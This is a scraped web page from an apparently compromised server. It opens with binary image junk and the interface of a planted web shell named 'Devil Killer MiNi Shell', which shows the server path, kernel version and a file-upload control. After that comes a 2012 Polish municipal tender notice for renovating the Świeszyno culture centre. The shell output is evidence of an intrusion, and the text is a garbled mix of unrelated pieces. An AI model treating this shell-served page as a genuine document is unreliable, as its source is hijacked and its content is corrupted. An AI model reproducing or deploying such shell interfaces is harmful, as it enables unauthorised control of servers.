JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/81766-N-2012.html

<p class="kh_header"><b>Świeszyno: Multimedialne Centrum Kultury w Świeszynie e-Eureka
Remont budynku Gminnego Ośrodka Kultury wraz z zagospodarowaniem terenu</b><br>
<b>Numer ogłoszenia: 81766 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świeszyno , Świeszyno 71, 76-024 Świeszyno, woj. zachodniopomorskie, tel. 94 31 60 120, faks 94 31 61 491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ug.swieszyno.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Multimedialne Centrum Kultury w Świeszynie e-Eureka
Remont budynku Gminnego Ośrodka Kultury wraz z zagospodarowaniem terenu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w szczególności obejmuje wykonanie:
Przebudowa, rozbudowa i modernizacja budynku Gminnego Ośrodka Kultury w Świeszynie, działka nr 871/3  (powstała w wyniku podziału działki nr 871)  gm.  Świeszyno w zakresie wynikającym ze zmian w budynku  istniejącym  zgodnie z projektem architektoniczno - budowlanym, a mianowicie :

	modernizacja sali widowiskowej z zapleczem,
	modernizacja i przebudowa biblioteki,
	przebudowa pomieszczeń na piętrze,
	termomodernizacja ścian,
	wymiana stolarki okiennej na PCV,
	przebudowa kotłowni tradycyjnej na kotłownię gazową,
	przebudowa instalacji zimnej i ciepłej wody,
	przebudowa instalacji ogrzewania c. o.,
	przebudowa instalacji elektrycznej,
	utwardzenie placów postojowych, dojść i dojazdów do budynku,
	remont ziemnej piwnicy,
	budowa amfiteatru naziemnego wraz z zagospodarowaniem placu.

Dane techniczne obiektu.

Dane charakteryzujące obiekt - stan istniejący :

- długość 				-		 34,10 m
- szerokość 				- 		 13,35 m
- max wysokość			             - 		   8,10 m

Szczegółowy zakres robót:

1.	Zagospodarowanie terenu:
Drogi i place:
Zaprojektowano ułożenie 51,0m2 chodnika z kostki POLBRUK grubości 60mm i 501,87m2 nawierzchni z kostki betonowej POLBRUK gr. 80mm na podsypce piaskowo-cementowej. Warstwa odsączająca o grubości po zagęszczeniu 10cm z piasku - 552,87m2. Ponadto należy ułożyć 88,35m krawężnika betonowego 15x30cm z wykonaniem ławy betonowej oraz 26,2 m obrzeża betonowego 30x8cm.
Amfiteatr: 
Wykonanie koryta o głębokości 20cm -325,59m2, chodnik z płyt betonowych 50x50x7 cm - 212,55m2, podłoga z kostki brukowej drewnianej na warstwie asfaltu i na podbudowie betonowej  - 113,04m2, stopnie schodów wykonywane bez podbudowy ze stopnicami o nawierzchni żwirowej oraz podstopnicami z połowizn drewnianych 16,2m, ławki drewniane siedzeniowe 89,0m.
Ognisko:
Urządzenie ogniska oraz wykonanie siedzisk 55,578m z podporami żelbetowymi, montaż listew siedzeń drewnianych 166,734m2.
Piwnica ziemna:
Uzupełnienie tynków zewnętrznych 9,24m2, spoinowanie bez wykucia spoin z murów z cegły 1,8m2, dwukrotne malowanie bez przetarcia tynków zewnętrznych 9,24m2 i stolarki drzwiowej 5,28m2.
Roboty porządkowe:
Plantowanie ręczne powierzchni gruntu rodzimego 1 476,00m2 i wykonanie trawników parkowych siewem bez nawożenia 0,15 ha.
2.	Termomodernizacja:
Docieplenie ścian fundamentowych: rozebranie elementów betonowych (opaska i chodnik 7,081m3, wykopy wąsko przestrzenne wraz z zasypaniem 56,648m3, ocieplenie ścian budynku płytami styropianowymi z siatką oraz izolacją przeciwwilgociową powłokową (dwie warstwy) - 56,65m2.
Termomodernizacja ścian: demontaż wraz z montażem rur spustowych 24,8m, obróbek blacharskich, parapetów okiennych - 50,2 m2,  daszku nad wejściem, krat okiennych 9,0m2, drabiny zewnętrznej 7,0m, przewodów uziemiających 22,9m, odbicie tynków zewnętrznych 37,768m2, naprawa tynków zewnętrznych, ocieplenie ścian płytami styropianowymi gr. 12 cm-524,22m2, montaż listew startowych- 94,08m, ocieplenie ościeży -40,38m2, ochrona kątownikiem narożników -222,85m, wykonanie obróbek blacharskich 66,72m2,  obsadzenie kratek wentylacyjnych 32 szt., wykonanie tynku polimerowo - mineralnego barwionego 564,60m2, ocieplenie cokołu płytami styropianowymi gr. 10cm z tynkiem mozaikowym 28,22m2 oraz koniecznym skuciem wystającego cokołu
Opaska wokół budynku:
Chodnik z płyt betonowych 50x50x7 cm - 35,245m2,obrzeża betonowe o wym. 30x8cm - 70,49m, rozplantowanie ziemi z wykopów - 3,53m3.
3.	Roboty budowlane budynek główny:
Wejście do budynku: wykonanie schodów zewnętrznych 1,683m3 wraz z okładziną płytkami kamionkowymi GRES 7,557m2. Wejście należy dostosować dla potrzeb osób niepełnosprawnych ( na wózkach).
Roboty rozbiórkowe: rozbiórka konstrukcji z cegły - 5,842m3, wykucie z muru ościeżnic stalowych szt. 3, rozebranie posadzki z deszczułek 180,58m2, rozebranie boazerii drewnianych wraz z rusztem -279,992m2, rozbiórka sufitu z siatki maskującej -132,13 m2, rozebranie posadzki z tworzyw sztucznych- 232,26m2, z płytek na zaprawie 75,48m2, rozebranie sufitów podwieszonych -48,28m2, okładziny ścian 3,438m2, rozebranie lamp oświetleniowych, białego montażu, elementów sanitarnych, instalacji i osprzętu c.o., kotłowni, instalacji i osprzętu elektrycznego.
Roboty remontowo - budowlane: wykonanie przesklepień z belek stalowych 10,0m, wykucie otworów w ścianach i obsadzenie nawietrzników podokiennych 32 szt., wymiana okien zespolonych na okna uchylno -rozwierane PCV - 53,375m2, wymiana podokienników drewnianych -32 szt., wymiana drzwi zewnętrznych -14,8m2, ścianki działowe z cegły - 84,36m2, tynki cienkowarstwowe - 1678,71m2, obsadzenie okienka podawczego, obsadzenie ościeżnic stalowych drzwi - 10 szt., przegrody z tworzyw sztucznych (laminat wysokociśnieniowy) - 16,94m2, okładziny płyt gipsowo - kartonowych na ścianach - 239,68m2, obudowa sceny - 7,0m2, strop podwieszony z płyt gipsowo - kartonowych (sala widowiskowa) - 132,12m2,  posadzka z deszczułek na lepiku - 132,12m2,  izolacja pomieszczeń mokrych płynną folią uszczelniającą - 41,97m2, okładziny z płytek ceramicznych na ścianach - 117,26m2, gładzie gipsowe jednowarstwowe na ścianach i sufitach z gruntowaniem - 1654,425m2, gruntowanie podłoży, warstwy wyrównawcze z zaprawy samopoziomującej, posadzka z wykładziny z tworzywa sztucznego - 333,39m2, montaż skrzydeł drzwiowych wewnętrznych -17,6m2, sufity podwieszone na konstrukcji metalowej - 43,92m2, malowanie tynków wewnętrznych według projektu kolorystyki (aranżacji wnętrz) - 1654,42m2, montaż wywietrzników dachowych 4 szt.
Kotłownia: rozbiórka elementów betonowych - 0,042m3, wykopy wewnątrz budynku - 0,608m3, usunięcie z budynku gruzu i ziemi, wykucie z muru i wstawienie nowych drzwi zewnętrznych - 2,10m2, posadzka - odtłuszczenie, fluatowanie, neutralizacja, malowanie lakierem, emalią chlorokauczukową - 17,0m2, malowanie farba chlorokauczukową ścian -21,66m2, malowanie tynków wewnętrznych farbą emulsyjną 104,62m2.
4.	Remont instalacji wodno-kanalizacyjnej
Instalacja wody zimnej: szafki hydrantowe - 2szt., rurociągi stalowe ocynkowane śr. 25mm - 13,6m, wykucie bruzd - 61,0m, zabetonowanie bruzd i wykonanie pasów tynku - 61,0m,  rurociągi miedziane-57,5m, dodatkowe podejścia do zaworów czerpalnych - 20szt, podejścia odpływowe z PCV - 24szt., 
Instalacja ciepłej wody + cyrkulacja: rurociągi miedziane o śr. 28, 22, 15mm - 39,5m, dodatki za podejścia -7szt., zawory umywalkowe - 7szt., rury ochronne, izolacje -45,5m.
Próby instalacji: próba szczelności instalacji wodociągowej wraz z płukaniem - 110,6m
Kanalizacja: rurociągi kanalizacyjne śr. 160 - 10,5m, rury wywiewne - szt.3, rurociągi kanalizacyjne o śr. 110 i 50mm - 29,7m,  czyszczaki - szt. 5, wpusty ściekowe - 2szt.
Armatura: montaż: umywalek 9szt., zlewozmywaków z blachy nierdzewnej na szafce - 2szt., ustępy z płuczką ustępową typu (kom pakt)-8szt., pisuary pojedyncze - 1kpl., baterie umywalkowe lub zlewozmywakowe -11szt., elektryczne podgrzewacze wody -kpl. 3.
Demontaż: demontaż zlewu kuchennego, termy elektrycznej, baterii ściennej umywalkowej i zlewozmywakowej, umywalki porcelanowej, ustępu z miską porcelanową, rur kanalizacyjnych, wodociągowych, wpusty ściekowe.
5.	Roboty instalacyjne c. o.
Roboty demontażowe: demontaż grzejników c. o. - 28 kpl., demontaż rurociągu stalowego -120,0m.
Instalacje centralnego ogrzewania: rurociągi miedziane -379,8m, rury ochronne -4,2m, rury przyłączne miedziane - 34kpl., grzejniki stalowe dwupłytowe -34 szt., zawory grzejnikowe termostatyczne -34szt., zawory odpowietrzające -4szt., zawory zwrotne - szt.34, izolacja rurociągów - 379,8m, próby szczelności instalacji na zimno i gorąco oraz regulacja układu grzewczego.
Roboty budowlane: przebicia otworów - szt.14, wykucia bruzd - 189,9m, zabetonowanie bruzd - 189,9m.
6.	Roboty elektryczne
Instalacje elektryczne: demontaż opraw żarowych, łączników, gniazd, puszek, przewodów, tablic rozdzielczych, przebijanie otworów w ścianach -50szt., mechaniczne wykucie bruzd - 618,0m, zaprawienie bruzd - 618,0m, układanie w rurach kabli - 18,0m, obróbka na sucho kabli - 4, układanie kabli pod tynkiem - 1326,0m, przygotowanie podłoża pod osprzęt instalacyjny - 79 szt., montaż łączników podtynkowych - 108 szt., montaż gniazd - 56szt., montaż obudów tablic rozdzielczych - szt. 2 wraz z wyposażeniem tablic w osprzęt, przygotowanie podłoża pod oprawy oświetleniowe - 111kpl., montaż na gotowym podłożu opraw świetlówkowych -  111 szt., przykręcenie na gotowym podłożu aparatów - 15szt., układanie przewodów wyrównawczych - 25m, sprawdzenie i pomiar obwodu elektrycznego  91szt.,
Instalacje teletechniczne: mechaniczne wykucie bruzd - m16,0, zaprawienie bruzd - 16,0m, układanie pod tynkiem rur winidurowych - 16,0m, instalowanie panelowych wzmacniaczy - 1szt.
Okablowanie wraz z wyposażeniem w osprzęt oświetlenia sceny.
7.	Ogrodzenie
Demontaż starego ogrodzenia: demontaż balustrad schodowych -ilość cięć - 44szt., rozebranie betonowych ław, stóp fundamentowych - 7,65m3, rozebranie ogrodzenia z siatki na słupkach metalowych - 234,75m2, rozebranie bramy z siatki - 9,6m2, rozebranie furtki - 2,4m2, 
Wykonanie nowego ogrodzenia: roboty ziemne wykopy, zasypanie - -38,64m3, cokoły betonowe 0,20x0,30m - 185,5m, ogrodzenie z siatki o wysokości 1,5m na słupkach stalowych - 168,0m, bramy stalowe przesuwane ręczne - 4,8m2, ogrodzenie z siatki  w ramkach - 17,5m2, brama i furtka kpl. 1
8.	Kotłownia gazowa
Kotłownia instalacje: demontaż rurociągów, demontaż pompy, kotła, rozdzielacza z rur, naczynia wzbiorczego, montaż zawory żeliwne -6szt., zawory bezpieczeństwa - 1 szt., pompy ładowania podgrzewacza, obiegu grzewczego i cyrkulacyjna - po 1szt.,termometr - 1szt., mieszacz 3-drogowy - 1szt., zbiornik ciepłej wody  -1 kpl., odbiornik - kpl.1, filtr wody - 1szt., naczynie wzbiorcze przeponowe - 1szt., czujnik temperatury w podgrzewaczu - 1szt., czujnik temperatury wewn. I zewn. - 2szt., czujnik temperatury na zasileniu - 1sztr., rozdzielacze do kotłów i instalacji c. o. - 0,6m, ogranicznik ciśnienia wody - 1szt.,  ogranicznik temperatury wody - 1szt., system powietrzno spalinowy - 1szt., rurociągi stalowe - 42,5m, uruchomienie kotłowni, wykonanie izolowanego wkładu kominowego ze stali nierdzewnej.
Kocioł gazowy: kocioł  o mocy znamionowej do 50kW - kocioł o nominalnej mocy grzewczej 44,6kW
Instalacja gazowa wewnętrzna: rurociągi w instalacjach gazowych - 20,25m, malowanie rur, przejścia gazociągu przez ścianę -4szt., kuchnia gazowa o połączeniu złączem elastycznym z piekarnikiem - 1szt., zawór kulowy, zawór szybkozamykający, reduktor gazu, montaż gazomierza, montaż czujki specjalnej - wykrywanie gazu - 2szt., montaż sygnalizatora optyczno-akustycznego zewnętrznego, szafka gazowa, próba instalacji gazowej.
Instalacje elektryczne: przebijanie otworów - 4szt., montaż obudów tablic rozdzielczych - 2szt., montaż  wyłącznika przeciwporażeniowego - 2szt.,układanie na tynku przewodu kabelkowego - 130,0m, montaż gniazd, łączników -4szt., układanie przewodu wyrównawczego - 15,0m, pomiar.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zamawiający przewiduje możliwość udzielenia zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt 6 i 7</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.00.00-6, 45.30.00.00-0, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 20 000,00 zł (słownie: dwadzieścia tysięcy złotych),  w terminie do  05.04.2012r.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, co najmniej trzy roboty polegające na remoncie budynków o wartości min. 500 tys. zł (pięćset tysięcy złotych)  netto - jeden remont.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: 
a)  zamawiający wymaga, by osoba pełniąca funkcję kierownika budowy posiadała uprawnienia budowlane oraz przynależała do właściwej Izby Inżynierów Budownictwa.
b)  Wykonawca dysponuje potencjałem kadrowym niezbędnym do wykonania przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga, by osoba pełniąca funkcję kierownika budowy posiadała uprawnienia budowlane oraz przynależała do właściwej Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż wartość oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ug.swieszyno.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świeszyno
76-024 Świeszyno pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2012 godzina 10:00, miejsce: Urząd Gminy Świeszyno
76-024 Swieszyno 71
